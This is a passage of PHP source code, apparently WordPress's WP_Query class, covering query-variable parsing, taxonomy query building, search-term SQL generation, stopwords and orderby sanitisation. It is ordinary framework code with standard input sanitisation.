* @type bool $update_post_meta_cache Whether to update the post meta cache. Default true.
* @type bool $update_post_term_cache Whether to update the post term cache. Default true.
* @type bool $update_menu_item_cache Whether to update the menu item cache. Default false.
* @type bool $lazy_load_term_meta Whether to lazy-load term meta. Setting to false will
* disable cache priming for term meta, so that each
* get_term_meta() call will hit the database.
* Defaults to the value of `$update_post_term_cache`.
* @type int $w The week number of the year. Default empty. Accepts numbers 0-53.
* @type int $year The four-digit year. Default empty. Accepts any four-digit year.
* }
*/
public function parse_query( $query = '' ) {
if ( ! empty( $query ) ) {
$this->init();
$this->query = wp_parse_args( $query );
$this->query_vars = $this->query;
} elseif ( ! isset( $this->query ) ) {
$this->query = $this->query_vars;
}
$this->query_vars = $this->fill_query_vars( $this->query_vars );
$query_vars = &$this->query_vars;
$this->query_vars_changed = true;
if ( ! empty( $query_vars['robots'] ) ) {
$this->is_robots = true;
} elseif ( ! empty( $query_vars['favicon'] ) ) {
$this->is_favicon = true;
}
if ( ! is_scalar( $query_vars['p'] ) || (int) $query_vars['p'] < 0 ) {
$query_vars['p'] = 0;
$query_vars['error'] = '404';
} else {
$query_vars['p'] = (int) $query_vars['p'];
}
$query_vars['page_id'] = is_scalar( $query_vars['page_id'] ) ? absint( $query_vars['page_id'] ) : 0;
$query_vars['year'] = is_scalar( $query_vars['year'] ) ? absint( $query_vars['year'] ) : 0;
$query_vars['monthnum'] = is_scalar( $query_vars['monthnum'] ) ? absint( $query_vars['monthnum'] ) : 0;
$query_vars['day'] = is_scalar( $query_vars['day'] ) ? absint( $query_vars['day'] ) : 0;
$query_vars['w'] = is_scalar( $query_vars['w'] ) ? absint( $query_vars['w'] ) : 0;
$query_vars['m'] = is_scalar( $query_vars['m'] ) ? preg_replace( '|[^0-9]|', '', $query_vars['m'] ) : '';
$query_vars['paged'] = is_scalar( $query_vars['paged'] ) ? absint( $query_vars['paged'] ) : 0;
$query_vars['cat'] = preg_replace( '|[^0-9,-]|', '', $query_vars['cat'] ); // Array or comma-separated list of positive or negative integers.
$query_vars['author'] = is_scalar( $query_vars['author'] ) ? preg_replace( '|[^0-9,-]|', '', $query_vars['author'] ) : ''; // Comma-separated list of positive or negative integers.
$query_vars['pagename'] = is_scalar( $query_vars['pagename'] ) ? trim( $query_vars['pagename'] ) : '';
$query_vars['name'] = is_scalar( $query_vars['name'] ) ? trim( $query_vars['name'] ) : '';
$query_vars['title'] = is_scalar( $query_vars['title'] ) ? trim( $query_vars['title'] ) : '';
if ( is_scalar( $query_vars['hour'] ) && '' !== $query_vars['hour'] ) {
$query_vars['hour'] = absint( $query_vars['hour'] );
} else {
$query_vars['hour'] = '';
}
if ( is_scalar( $query_vars['minute'] ) && '' !== $query_vars['minute'] ) {
$query_vars['minute'] = absint( $query_vars['minute'] );
} else {
$query_vars['minute'] = '';
}
if ( is_scalar( $query_vars['second'] ) && '' !== $query_vars['second'] ) {
$query_vars['second'] = absint( $query_vars['second'] );
} else {
$query_vars['second'] = '';
}
if ( is_scalar( $query_vars['menu_order'] ) && '' !== $query_vars['menu_order'] ) {
$query_vars['menu_order'] = absint( $query_vars['menu_order'] );
} else {
$query_vars['menu_order'] = '';
}
// Fairly large, potentially too large, upper bound for search string lengths.
if ( ! is_scalar( $query_vars['s'] ) || ( ! empty( $query_vars['s'] ) && strlen( $query_vars['s'] ) > 1600 ) ) {
$query_vars['s'] = '';
}
// Compat. Map subpost to attachment.
if ( is_scalar( $query_vars['subpost'] ) && '' != $query_vars['subpost'] ) {
$query_vars['attachment'] = $query_vars['subpost'];
}
if ( is_scalar( $query_vars['subpost_id'] ) && '' != $query_vars['subpost_id'] ) {
$query_vars['attachment_id'] = $query_vars['subpost_id'];
}
$query_vars['attachment_id'] = is_scalar( $query_vars['attachment_id'] ) ? absint( $query_vars['attachment_id'] ) : 0;
if ( ( '' !== $query_vars['attachment'] ) || ! empty( $query_vars['attachment_id'] ) ) {
$this->is_single = true;
$this->is_attachment = true;
} elseif ( '' !== $query_vars['name'] ) {
$this->is_single = true;
} elseif ( $query_vars['p'] ) {
$this->is_single = true;
} elseif ( '' !== $query_vars['pagename'] || ! empty( $query_vars['page_id'] ) ) {
$this->is_page = true;
$this->is_single = false;
} else {
// Look for archive queries. Dates, categories, authors, search, post type archives.
if ( isset( $this->query['s'] ) ) {
$this->is_search = true;
}
if ( '' !== $query_vars['second'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( '' !== $query_vars['minute'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( '' !== $query_vars['hour'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( $query_vars['day'] ) {
if ( ! $this->is_date ) {
$date = sprintf( '%04d-%02d-%02d', $query_vars['year'], $query_vars['monthnum'], $query_vars['day'] );
if ( $query_vars['monthnum'] && $query_vars['year'] && ! wp_checkdate( $query_vars['monthnum'], $query_vars['day'], $query_vars['year'], $date ) ) {
$query_vars['error'] = '404';
} else {
$this->is_day = true;
$this->is_date = true;
}
}
}
if ( $query_vars['monthnum'] ) {
if ( ! $this->is_date ) {
if ( 12 < $query_vars['monthnum'] ) {
$query_vars['error'] = '404';
} else {
$this->is_month = true;
$this->is_date = true;
}
}
}
if ( $query_vars['year'] ) {
if ( ! $this->is_date ) {
$this->is_year = true;
$this->is_date = true;
}
}
if ( $query_vars['m'] ) {
$this->is_date = true;
if ( strlen( $query_vars['m'] ) > 9 ) {
$this->is_time = true;
} elseif ( strlen( $query_vars['m'] ) > 7 ) {
$this->is_day = true;
} elseif ( strlen( $query_vars['m'] ) > 5 ) {
$this->is_month = true;
} else {
$this->is_year = true;
}
}
if ( $query_vars['w'] ) {
$this->is_date = true;
}
$this->query_vars_hash = false;
$this->parse_tax_query( $query_vars );
foreach ( $this->tax_query->queries as $tax_query ) {
if ( ! is_array( $tax_query ) ) {
continue;
}
if ( isset( $tax_query['operator'] ) && 'NOT IN' !== $tax_query['operator'] ) {
switch ( $tax_query['taxonomy'] ) {
case 'category':
$this->is_category = true;
break;
case 'post_tag':
$this->is_tag = true;
break;
default:
$this->is_tax = true;
}
}
}
unset( $tax_query );
if ( empty( $query_vars['author'] ) || ( '0' == $query_vars['author'] ) ) {
$this->is_author = false;
} else {
$this->is_author = true;
}
if ( '' !== $query_vars['author_name'] ) {
$this->is_author = true;
}
if ( ! empty( $query_vars['post_type'] ) && ! is_array( $query_vars['post_type'] ) ) {
$post_type_obj = get_post_type_object( $query_vars['post_type'] );
if ( ! empty( $post_type_obj->has_archive ) ) {
$this->is_post_type_archive = true;
}
}
if ( $this->is_post_type_archive || $this->is_date || $this->is_author || $this->is_category || $this->is_tag || $this->is_tax ) {
$this->is_archive = true;
}
}
if ( '' != $query_vars['feed'] ) {
$this->is_feed = true;
}
if ( '' != $query_vars['embed'] ) {
$this->is_embed = true;
}
if ( '' != $query_vars['tb'] ) {
$this->is_trackback = true;
}
if ( '' != $query_vars['paged'] && ( (int) $query_vars['paged'] > 1 ) ) {
$this->is_paged = true;
}
// If we're previewing inside the write screen.
if ( '' != $query_vars['preview'] ) {
$this->is_preview = true;
}
if ( is_admin() ) {
$this->is_admin = true;
}
if ( str_contains( $query_vars['feed'], 'comments-' ) ) {
$query_vars['feed'] = str_replace( 'comments-', '', $query_vars['feed'] );
$query_vars['withcomments'] = 1;
}
$this->is_singular = $this->is_single || $this->is_page || $this->is_attachment;
if ( $this->is_feed && ( ! empty( $query_vars['withcomments'] ) || ( empty( $query_vars['withoutcomments'] ) && $this->is_singular ) ) ) {
$this->is_comment_feed = true;
}
if ( ! ( $this->is_singular || $this->is_archive || $this->is_search || $this->is_feed
|| ( wp_is_serving_rest_request() && $this->is_main_query() )
|| $this->is_trackback || $this->is_404 || $this->is_admin || $this->is_robots || $this->is_favicon ) ) {
$this->is_home = true;
}
// Correct `is_*` for 'page_on_front' and 'page_for_posts'.
if ( $this->is_home && 'page' === get_option( 'show_on_front' ) && get_option( 'page_on_front' ) ) {
$_query = wp_parse_args( $this->query );
// 'pagename' can be set and empty depending on matched rewrite rules. Ignore an empty 'pagename'.
if ( isset( $_query['pagename'] ) && '' === $_query['pagename'] ) {
unset( $_query['pagename'] );
}
unset( $_query['embed'] );
if ( empty( $_query ) || ! array_diff( array_keys( $_query ), array( 'preview', 'page', 'paged', 'cpage' ) ) ) {
$this->is_page = true;
$this->is_home = false;
$query_vars['page_id'] = get_option( 'page_on_front' );
// Correct <!--nextpage--> for 'page_on_front'.
if ( ! empty( $query_vars['paged'] ) ) {
$query_vars['page'] = $query_vars['paged'];
unset( $query_vars['paged'] );
}
}
}
if ( '' !== $query_vars['pagename'] ) {
$this->queried_object = get_page_by_path( $query_vars['pagename'] );
if ( $this->queried_object && 'attachment' === $this->queried_object->post_type ) {
if ( preg_match( '/^[^%]*%(?:postname)%/', get_option( 'permalink_structure' ) ) ) {
// See if we also have a post with the same slug.
$post = get_page_by_path( $query_vars['pagename'], OBJECT, 'post' );
if ( $post ) {
$this->queried_object = $post;
$this->is_page = false;
$this->is_single = true;
}
}
}
if ( ! empty( $this->queried_object ) ) {
$this->queried_object_id = (int) $this->queried_object->ID;
} else {
unset( $this->queried_object );
}
if ( 'page' === get_option( 'show_on_front' ) && isset( $this->queried_object_id ) && get_option( 'page_for_posts' ) == $this->queried_object_id ) {
$this->is_page = false;
$this->is_home = true;
$this->is_posts_page = true;
}
if ( isset( $this->queried_object_id ) && get_option( 'wp_page_for_privacy_policy' ) == $this->queried_object_id ) {
$this->is_privacy_policy = true;
}
}
if ( $query_vars['page_id'] ) {
if ( 'page' === get_option( 'show_on_front' ) && get_option( 'page_for_posts' ) == $query_vars['page_id'] ) {
$this->is_page = false;
$this->is_home = true;
$this->is_posts_page = true;
}
if ( get_option( 'wp_page_for_privacy_policy' ) == $query_vars['page_id'] ) {
$this->is_privacy_policy = true;
}
}
if ( ! empty( $query_vars['post_type'] ) ) {
if ( is_array( $query_vars['post_type'] ) ) {
$query_vars['post_type'] = array_map( 'sanitize_key', array_unique( $query_vars['post_type'] ) );
sort( $query_vars['post_type'] );
} else {
$query_vars['post_type'] = sanitize_key( $query_vars['post_type'] );
}
}
if ( ! empty( $query_vars['post_status'] ) ) {
if ( is_array( $query_vars['post_status'] ) ) {
$query_vars['post_status'] = array_map( 'sanitize_key', array_unique( $query_vars['post_status'] ) );
sort( $query_vars['post_status'] );
} else {
$query_vars['post_status'] = preg_replace( '|[^a-z0-9_,-]|', '', $query_vars['post_status'] );
}
}
if ( $this->is_posts_page && ( ! isset( $query_vars['withcomments'] ) || ! $query_vars['withcomments'] ) ) {
$this->is_comment_feed = false;
}
$this->is_singular = $this->is_single || $this->is_page || $this->is_attachment;
// Done correcting `is_*` for 'page_on_front' and 'page_for_posts'.
if ( '404' == $query_vars['error'] ) {
$this->set_404();
}
$this->is_embed = $this->is_embed && ( $this->is_singular || $this->is_404 );
$this->query_vars_hash = md5( serialize( $this->query_vars ) );
$this->query_vars_changed = false;
/**
* Fires after the main query vars have been parsed.
*
* @since 1.5.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'parse_query', array( &$this ) );
}
/**
* Parses various taxonomy related query vars.
*
* For BC, this method is not marked as protected. See [28987].
*
* @since 3.1.0
*
* @param array $query_vars The query variables. Passed by reference.
*/
public function parse_tax_query( &$query_vars ) {
if ( ! empty( $query_vars['tax_query'] ) && is_array( $query_vars['tax_query'] ) ) {
$tax_query = $query_vars['tax_query'];
} else {
$tax_query = array();
}
if ( ! empty( $query_vars['taxonomy'] ) && ! empty( $query_vars['term'] ) ) {
$tax_query[] = array(
'taxonomy' => $query_vars['taxonomy'],
'terms' => array( $query_vars['term'] ),
'field' => 'slug',
);
}
foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy => $t ) {
if ( 'post_tag' === $taxonomy ) {
continue; // Handled further down in the $query_vars['tag'] block.
}
if ( $t->query_var && ! empty( $query_vars[ $t->query_var ] ) ) {
$tax_query_defaults = array(
'taxonomy' => $taxonomy,
'field' => 'slug',
);
if ( ! empty( $t->rewrite['hierarchical'] ) ) {
$query_vars[ $t->query_var ] = wp_basename( $query_vars[ $t->query_var ] );
}
$term = $query_vars[ $t->query_var ];
if ( ! is_array( $term ) ) {
$term = explode( ',', $term );
$term = array_map( 'trim', $term );
}
sort( $term );
$term = implode( ',', $term );
if ( str_contains( $term, '+' ) ) {
$terms = preg_split( '/[+]+/', $term );
foreach ( $terms as $term ) {
$tax_query[] = array_merge(
$tax_query_defaults,
array(
'terms' => array( $term ),
)
);
}
} else {
$tax_query[] = array_merge(
$tax_query_defaults,
array(
'terms' => preg_split( '/[,]+/', $term ),
)
);
}
}
}
// If query string 'cat' is an array, implode it.
if ( is_array( $query_vars['cat'] ) ) {
$query_vars['cat'] = implode( ',', $query_vars['cat'] );
}
// Category stuff.
if ( ! empty( $query_vars['cat'] ) && ! $this->is_singular ) {
$cat_in = array();
$cat_not_in = array();
$cat_array = preg_split( '/[,\s]+/', urldecode( $query_vars['cat'] ) );
$cat_array = array_map( 'intval', $cat_array );
sort( $cat_array );
$query_vars['cat'] = implode( ',', $cat_array );
foreach ( $cat_array as $cat ) {
if ( $cat > 0 ) {
$cat_in[] = $cat;
} elseif ( $cat < 0 ) {
$cat_not_in[] = abs( $cat );
}
}
if ( ! empty( $cat_in ) ) {
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $cat_in,
'field' => 'term_id',
'include_children' => true,
);
}
if ( ! empty( $cat_not_in ) ) {
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $cat_not_in,
'field' => 'term_id',
'operator' => 'NOT IN',
'include_children' => true,
);
}
unset( $cat_array, $cat_in, $cat_not_in );
}
if ( ! empty( $query_vars['category__and'] ) && 1 === count( (array) $query_vars['category__and'] ) ) {
$query_vars['category__and'] = (array) $query_vars['category__and'];
if ( ! isset( $query_vars['category__in'] ) ) {
$query_vars['category__in'] = array();
}
$query_vars['category__in'][] = absint( reset( $query_vars['category__and'] ) );
unset( $query_vars['category__and'] );
}
if ( ! empty( $query_vars['category__in'] ) ) {
$query_vars['category__in'] = array_map( 'absint', array_unique( (array) $query_vars['category__in'] ) );
sort( $query_vars['category__in'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__in'],
'field' => 'term_id',
'include_children' => false,
);
}
if ( ! empty( $query_vars['category__not_in'] ) ) {
$query_vars['category__not_in'] = array_map( 'absint', array_unique( (array) $query_vars['category__not_in'] ) );
sort( $query_vars['category__not_in'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__not_in'],
'operator' => 'NOT IN',
'include_children' => false,
);
}
if ( ! empty( $query_vars['category__and'] ) ) {
$query_vars['category__and'] = array_map( 'absint', array_unique( (array) $query_vars['category__and'] ) );
sort( $query_vars['category__and'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__and'],
'field' => 'term_id',
'operator' => 'AND',
'include_children' => false,
);
}
// If query string 'tag' is array, implode it.
if ( is_array( $query_vars['tag'] ) ) {
$query_vars['tag'] = implode( ',', $query_vars['tag'] );
}
// Tag stuff.
if ( '' !== $query_vars['tag'] && ! $this->is_singular && $this->query_vars_changed ) {
if ( str_contains( $query_vars['tag'], ',' ) ) {
// @todo Handle normalizing `tag` query string.
$tags = preg_split( '/[,\r\n\t ]+/', $query_vars['tag'] );
foreach ( (array) $tags as $tag ) {
$tag = sanitize_term_field( 'slug', $tag, 0, 'post_tag', 'db' );
$query_vars['tag_slug__in'][] = $tag;
sort( $query_vars['tag_slug__in'] );
}
} elseif ( preg_match( '/[+\r\n\t ]+/', $query_vars['tag'] ) || ! empty( $query_vars['cat'] ) ) {
$tags = preg_split( '/[+\r\n\t ]+/', $query_vars['tag'] );
foreach ( (array) $tags as $tag ) {
$tag = sanitize_term_field( 'slug', $tag, 0, 'post_tag', 'db' );
$query_vars['tag_slug__and'][] = $tag;
}
} else {
$query_vars['tag'] = sanitize_term_field( 'slug', $query_vars['tag'], 0, 'post_tag', 'db' );
$query_vars['tag_slug__in'][] = $query_vars['tag'];
sort( $query_vars['tag_slug__in'] );
}
}
if ( ! empty( $query_vars['tag_id'] ) ) {
$query_vars['tag_id'] = absint( $query_vars['tag_id'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_id'],
);
}
if ( ! empty( $query_vars['tag__in'] ) ) {
$query_vars['tag__in'] = array_map( 'absint', array_unique( (array) $query_vars['tag__in'] ) );
sort( $query_vars['tag__in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__in'],
);
}
if ( ! empty( $query_vars['tag__not_in'] ) ) {
$query_vars['tag__not_in'] = array_map( 'absint', array_unique( (array) $query_vars['tag__not_in'] ) );
sort( $query_vars['tag__not_in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__not_in'],
'operator' => 'NOT IN',
);
}
if ( ! empty( $query_vars['tag__and'] ) ) {
$query_vars['tag__and'] = array_map( 'absint', array_unique( (array) $query_vars['tag__and'] ) );
sort( $query_vars['tag__and'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__and'],
'operator' => 'AND',
);
}
if ( ! empty( $query_vars['tag_slug__in'] ) ) {
$query_vars['tag_slug__in'] = array_map( 'sanitize_title_for_query', array_unique( (array) $query_vars['tag_slug__in'] ) );
sort( $query_vars['tag_slug__in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_slug__in'],
'field' => 'slug',
);
}
if ( ! empty( $query_vars['tag_slug__and'] ) ) {
$query_vars['tag_slug__and'] = array_map( 'sanitize_title_for_query', array_unique( (array) $query_vars['tag_slug__and'] ) );
sort( $query_vars['tag_slug__and'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_slug__and'],
'field' => 'slug',
'operator' => 'AND',
);
}
$this->tax_query = new WP_Tax_Query( $tax_query );
/**
* Fires after taxonomy-related query vars have been parsed.
*
* @since 3.7.0
*
* @param WP_Query $query The WP_Query instance.
*/
do_action( 'parse_tax_query', $this );
}
/**
* Generates SQL for the WHERE clause based on passed search terms.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @return string WHERE clause.
*/
protected function parse_search( &$query_vars ) {
global $wpdb;
$search = '';
// Added slashes screw with quote grouping when done early, so done later.
$query_vars['s'] = stripslashes( $query_vars['s'] );
if ( empty( $_GET['s'] ) && $this->is_main_query() ) {
$query_vars['s'] = urldecode( $query_vars['s'] );
}
// There are no line breaks in <input /> fields.
$query_vars['s'] = str_replace( array( "\r", "\n" ), '', $query_vars['s'] );
$query_vars['search_terms_count'] = 1;
if ( ! empty( $query_vars['sentence'] ) ) {
$query_vars['search_terms'] = array( $query_vars['s'] );
} else {
if ( preg_match_all( '/".*?("|$)|((?<=[\t ",+])|^)[^\t ",+]+/', $query_vars['s'], $matches ) ) {
$query_vars['search_terms_count'] = count( $matches[0] );
$query_vars['search_terms'] = $this->parse_search_terms( $matches[0] );
// If the search string has only short terms or stopwords, or is 10+ terms long, match it as sentence.
if ( empty( $query_vars['search_terms'] ) || count( $query_vars['search_terms'] ) > 9 ) {
$query_vars['search_terms'] = array( $query_vars['s'] );
}
} else {
$query_vars['search_terms'] = array( $query_vars['s'] );
}
}
$n = ! empty( $query_vars['exact'] ) ? '' : '%';
$searchand = '';
$query_vars['search_orderby_title'] = array();
$default_search_columns = array( 'post_title', 'post_excerpt', 'post_content' );
$search_columns = ! empty( $query_vars['search_columns'] ) ? $query_vars['search_columns'] : $default_search_columns;
if ( ! is_array( $search_columns ) ) {
$search_columns = array( $search_columns );
}
/**
* Filters the columns to search in a WP_Query search.
*
* The supported columns are `post_title`, `post_excerpt` and `post_content`.
* They are all included by default.
*
* @since 6.2.0
*
* @param string[] $search_columns Array of column names to be searched.
* @param string $search Text being searched.
* @param WP_Query $query The current WP_Query instance.
*/
$search_columns = (array) apply_filters( 'post_search_columns', $search_columns, $query_vars['s'], $this );
// Use only supported search columns.
$search_columns = array_intersect( $search_columns, $default_search_columns );
if ( empty( $search_columns ) ) {
$search_columns = $default_search_columns;
}
/**
* Filters the prefix that indicates that a search term should be excluded from results.
*
* @since 4.7.0
*
* @param string $exclusion_prefix The prefix. Default '-'. Returning
* an empty value disables exclusions.
*/
$exclusion_prefix = apply_filters( 'wp_query_search_exclusion_prefix', '-' );
foreach ( $query_vars['search_terms'] as $term ) {
// If there is an $exclusion_prefix, terms prefixed with it should be excluded.
$exclude = $exclusion_prefix && str_starts_with( $term, $exclusion_prefix );
if ( $exclude ) {
$like_op = 'NOT LIKE';
$andor_op = 'AND';
$term = substr( $term, 1 );
} else {
$like_op = 'LIKE';
$andor_op = 'OR';
}
if ( $n && ! $exclude ) {
$like = '%' . $wpdb->esc_like( $term ) . '%';
$query_vars['search_orderby_title'][] = $wpdb->prepare( "{$wpdb->posts}.post_title LIKE %s", $like );
}
$like = $n . $wpdb->esc_like( $term ) . $n;
$search_columns_parts = array();
foreach ( $search_columns as $search_column ) {
$search_columns_parts[ $search_column ] = $wpdb->prepare( "({$wpdb->posts}.$search_column $like_op %s)", $like );
}
if ( ! empty( $this->allow_query_attachment_by_filename ) ) {
$search_columns_parts['attachment'] = $wpdb->prepare( "(sq1.meta_value $like_op %s)", $like );
}
$search .= "$searchand(" . implode( " $andor_op ", $search_columns_parts ) . ')';
$searchand = ' AND ';
}
if ( ! empty( $search ) ) {
$search = " AND ({$search}) ";
if ( ! is_user_logged_in() ) {
$search .= " AND ({$wpdb->posts}.post_password = '') ";
}
}
return $search;
}
/**
* Checks if the terms are suitable for searching.
*
* Uses an array of stopwords (terms) that are excluded from the separate
* term matching when searching for posts. The list of English stopwords is
* the approximate search engines list, and is translatable.
*
* @since 3.7.0
*
* @param string[] $terms Array of terms to check.
* @return string[] Terms that are not stopwords.
*/
protected function parse_search_terms( $terms ) {
$strtolower = function_exists( 'mb_strtolower' ) ? 'mb_strtolower' : 'strtolower';
$checked = array();
$stopwords = $this->get_search_stopwords();
foreach ( $terms as $term ) {
// Keep before/after spaces when term is for exact match.
if ( preg_match( '/^".+"$/', $term ) ) {
$term = trim( $term, "\"'" );
} else {
$term = trim( $term, "\"' " );
}
// Avoid single A-Z and single dashes.
if ( ! $term || ( 1 === strlen( $term ) && preg_match( '/^[a-z\-]$/i', $term ) ) ) {
continue;
}
if ( in_array( call_user_func( $strtolower, $term ), $stopwords, true ) ) {
continue;
}
$checked[] = $term;
}
return $checked;
}
/**
* Retrieves stopwords used when parsing search terms.
*
* @since 3.7.0
*
* @return string[] Stopwords.
*/
protected function get_search_stopwords() {
if ( isset( $this->stopwords ) ) {
return $this->stopwords;
}
/*
* translators: This is a comma-separated list of very common words that should be excluded from a search,
* like a, an, and the. These are usually called "stopwords". You should not simply translate these individual
* words into your language. Instead, look for and provide commonly accepted stopwords in your language.
*/
$words = explode(
',',
_x(
'about,an,are,as,at,be,by,com,for,from,how,in,is,it,of,on,or,that,the,this,to,was,what,when,where,who,will,with,www',
'Comma-separated list of search stopwords in your language'
)
);
$stopwords = array();
foreach ( $words as $word ) {
$word = trim( $word, "\r\n\t " );
if ( $word ) {
$stopwords[] = $word;
}
}
/**
* Filters stopwords used when parsing search terms.
*
* @since 3.7.0
*
* @param string[] $stopwords Array of stopwords.
*/
$this->stopwords = apply_filters( 'wp_search_stopwords', $stopwords );
return $this->stopwords;
}
/**
* Generates SQL for the ORDER BY condition based on passed search terms.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @return string ORDER BY clause.
*/
protected function parse_search_order( &$query_vars ) {
global $wpdb;
if ( $query_vars['search_terms_count'] > 1 ) {
$num_terms = count( $query_vars['search_orderby_title'] );
// If the search terms contain negative queries, don't bother ordering by sentence matches.
$like = '';
if ( ! preg_match( '/(?:\s|^)\-/', $query_vars['s'] ) ) {
$like = '%' . $wpdb->esc_like( $query_vars['s'] ) . '%';
}
$search_orderby = '';
// Sentence match in 'post_title'.
if ( $like ) {
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_title LIKE %s THEN 1 ", $like );
}
/*
* Sanity limit, sort as sentence when more than 6 terms
* (few searches are longer than 6 terms and most titles are not).
*/
if ( $num_terms < 7 ) {
// All words in title.
$search_orderby .= 'WHEN ' . implode( ' AND ', $query_vars['search_orderby_title'] ) . ' THEN 2 ';
// Any word in title, not needed when $num_terms == 1.
if ( $num_terms > 1 ) {
$search_orderby .= 'WHEN ' . implode( ' OR ', $query_vars['search_orderby_title'] ) . ' THEN 3 ';
}
}
// Sentence match in 'post_content' and 'post_excerpt'.
if ( $like ) {
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_excerpt LIKE %s THEN 4 ", $like );
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_content LIKE %s THEN 5 ", $like );
}
if ( $search_orderby ) {
$search_orderby = '(CASE ' . $search_orderby . 'ELSE 6 END)';
}
} else {
// Single word or sentence search.
$search_orderby = reset( $query_vars['search_orderby_title'] ) . ' DESC';
}
return $search_orderby;
}
/**
* Converts the given orderby alias (if allowed) to a properly-prefixed value.
*
* @since 4.0.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $orderby Alias for the field to order by.
* @return string|false Table-prefixed value to used in the ORDER clause. False otherwise.
*/
protected function parse_orderby( $orderby ) {
global $wpdb;
// Used to filter values.
$allowed_keys = array(
'post_name',
'post_author',
'post_date',
'post_title',
'post_modified',
'post_parent',
'post_type',
'name',
'author',
'date',
'title',
'modified',
'parent',
'type',
'ID',
'menu_order',
'comment_count',
'rand',
'post__in',
'post_parent__in',
'post_name__in',
);
$primary_meta_key = '';
$primary_meta_query = false;
$meta_clauses = $this->meta_query->get_clauses();
if ( ! empty( $meta_clauses ) ) {
$primary_meta_query = reset( $meta_clauses );
if ( ! empty( $primary_meta_query['key'] ) ) {
$primary_meta_key = $primary_meta_query['key'];
$allowed_keys[] = $primary_meta_key;
}
$allowed_keys[] = 'meta_value';
$allowed_keys[] = 'meta_value_num';
$allowed_keys = array_merge( $allowed_keys, array_keys( $meta_clauses ) );
}
// If RAND() contains a seed value, sanitize and add to allowed keys.
$rand_with_seed = false;
if ( preg_match( '/RAND\(([0-9]+)\)/i', $orderby, $matches ) ) {
$orderby = sprintf( 'RAND(%s)', (int) $matches[1] );
$allowed_keys[] = $orderby;
$rand_with_seed = true;
}
if ( ! in_array( $orderby, $allowed_keys, true ) ) {
return false;
}
$orderby_clause = '';
switch ( $orderby ) {
case 'post_name':
case 'post_author':
case 'post_date':
case 'post_title':
case 'post_modified':
case 'post_parent':
case 'post_type':
case 'ID':
case 'menu_order':
case 'comment_count':
$orderby_clause = "{$wpdb->posts}.{$orderby}";
break;
case 'rand':
$orderby_clause = 'RAND()';
break;
case $primary_meta_key:
case 'meta_value':
if ( ! empty( $primary_meta_query['type'] ) ) {
$orderby_clause = "CAST({$primary_meta_query['alias']}.meta_value AS {$primary_meta_query['cast']})";
} else {
$orderby_clause = "{$primary_meta_query['alias']}.meta_value";
}
break;
case 'meta_value_num':
$orderby_clause = "{$primary_meta_query['alias']}.meta_value+0";
break;
case 'post__in':
if ( ! empty( $this->query_vars['post__in'] ) ) {
$orderby_clause = "FIELD({$wpdb->posts}.ID," . implode( ',', array_map( 'absint', $this->query_vars['post__in'] ) ) . ')';
}
break;
case 'post_parent__in':
if ( ! empty( $this->query_vars['post_parent__in'] ) ) {
$orderby_clause = "FIELD( {$wpdb->posts}.post_parent," . implode( ', ', array_map( 'absint', $this->query_vars['post_parent__in'] ) ) . ' )';
}
break;
case 'post_name__in':
if ( ! empty( $this->query_vars['post_name__in'] ) ) {
$post_name__in = array_map( 'sanitize_title_for_query', $this->query_vars['post_name__in'] );
$post_name__in_string = "'" . implode( "','", $post_name__in ) . "'";
$orderby_clause = "FIELD( {$wpdb->posts}.post_name," . $post_name__in_string . ' )';
}
break;
default:
if ( array_key_exists( $orderby, $meta_clauses ) ) {
// $orderby corresponds to a meta_query clause.
$meta_clause = $meta_clauses[ $orderby ];
$orderby_clause = "CAST({$meta_clause['alias']}.meta_value AS {$meta_clause['cast']})";
} elseif ( $rand_with_seed ) {
$orderby_clause = $orderby;
} else {
// Default: order by post field.
$orderby_clause = "{$wpdb->posts}.post_" . sanitize_key( $orderby );
}
break;
}
return $orderby_clause;
}
/**
* Parse an 'order' query variable and cast it to ASC or DESC as necessary.
*
* @since 4.0.0
*
* @param string $order The 'order' query variable.
* @return string The sanitized 'order' query variable.
*/
protected function parse_order( $order ) {
if ( ! is_string( $order ) || empty( $order ) ) {
return 'DESC';
}
if ( 'ASC' === strtoupper( $order ) ) {
return 'ASC';
} else {
return 'DESC';
}
}
/**
* Sets the 404 property and saves whether query is feed.
*
* @since 2.0.0
*/
public function set_404() {
$is_feed = $this->is_feed;
$this->init_query_flags();
$this->is_404 = true;
$this->is_feed = $is_feed;
/**
* Fires after a 404 is triggered.
*
* @since 5.5.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'set_404', array( $this ) );
}
/**
* Retrieves the value of a query variable.
*
* @since 1.5.0
* @since 3.9.0 The `$default_value` argument was introduced.
*
* @param string $query_var Query variable key.
* @param mixed $default_value Optional. Value to return if the query variable is not set.
* Default empty string.
* @return mixed Contents of the query variable.
*/
public function get( $query_var, $default_value = '' ) {
if ( isset( $this->query_vars[ $query_var ] ) ) {
return $this->query_vars[ $query_var ];
}
return $default_value;
}
/**
* Sets the value of a query variable.
*
* @since 1.5.0
*
* @param string $query_var Query variable key.
* @param mixed $value Query variable value.
*/
